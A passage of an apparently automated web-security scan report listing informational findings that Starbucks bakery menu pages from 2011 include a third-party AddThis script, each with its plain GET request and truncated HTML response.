6.191. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/birthday-cake-mini-doughnut

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/birthday-cake-mini-doughnut HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:38 GMT
Connection: close
Content-Length: 43600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.192. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-oat-bar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/blueberry-oat-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:40 GMT
Connection: close
Content-Length: 43374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.193. http://www.starbucks.com/menu/food/bakery/blueberry-scone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/blueberry-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:41 GMT
Connection: close
Content-Length: 43391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.194. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/blueberry-streusel-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/blueberry-streusel-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:08 GMT
Connection: close
Content-Length: 43635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.195. http://www.starbucks.com/menu/food/bakery/butter-croissant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/butter-croissant

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/butter-croissant HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:47 GMT
Connection: close
Content-Length: 43265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.196. http://www.starbucks.com/menu/food/bakery/cheese-danish  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cheese-danish

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/cheese-danish HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:45 GMT
Connection: close
Content-Length: 43330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.197. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-chunk-cookie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/chocolate-chunk-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:03 GMT
Connection: close
Content-Length: 43551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.198. http://www.starbucks.com/menu/food/bakery/chocolate-croissant  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-croissant

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/chocolate-croissant HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:17 GMT
Connection: close
Content-Length: 43529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.199. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-old-fashion-doughnut

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/chocolate-old-fashion-doughnut HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:15 GMT
Connection: close
Content-Length: 43829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.200. http://www.starbucks.com/menu/food/bakery/chonga-bagel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chonga-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/chonga-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:28 GMT
Connection: close
Content-Length: 44180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.201. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cinnamon-chip-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/cinnamon-chip-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:27 GMT
Connection: close
Content-Length: 43946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.202. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-orange-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/cranberry-orange-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:51 GMT
Connection: close
Content-Length: 43829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.203. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-chocolate-brownie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/double-chocolate-brownie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:53 GMT
Connection: close
Content-Length: 43608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.204. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-fudge-mini-doughnut

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/double-fudge-mini-doughnut HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:01 GMT
Connection: close
Content-Length: 43483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.205. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-iced-cinnamon-roll

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/double-iced-cinnamon-roll HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:05 GMT
Connection: close
Content-Length: 44454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.206. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/ginger-molasses-cookie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/ginger-molasses-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:34 GMT
Connection: close
Content-Length: 42902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.207. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/hawaiian-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/hawaiian-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:56 GMT
Connection: close
Content-Length: 43382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.208. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/iced-lemon-pound-cake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/iced-lemon-pound-cake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:22 GMT
Connection: close
Content-Length: 44302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.209. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/low-fat-raspberry-sunshine-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/low-fat-raspberry-sunshine-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:34 GMT
Connection: close
Content-Length: 43659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.210. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/mallorca-sweet-bread

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/mallorca-sweet-bread HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:34 GMT
Connection: close
Content-Length: 43885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.211. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/maple-oat-pecan-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

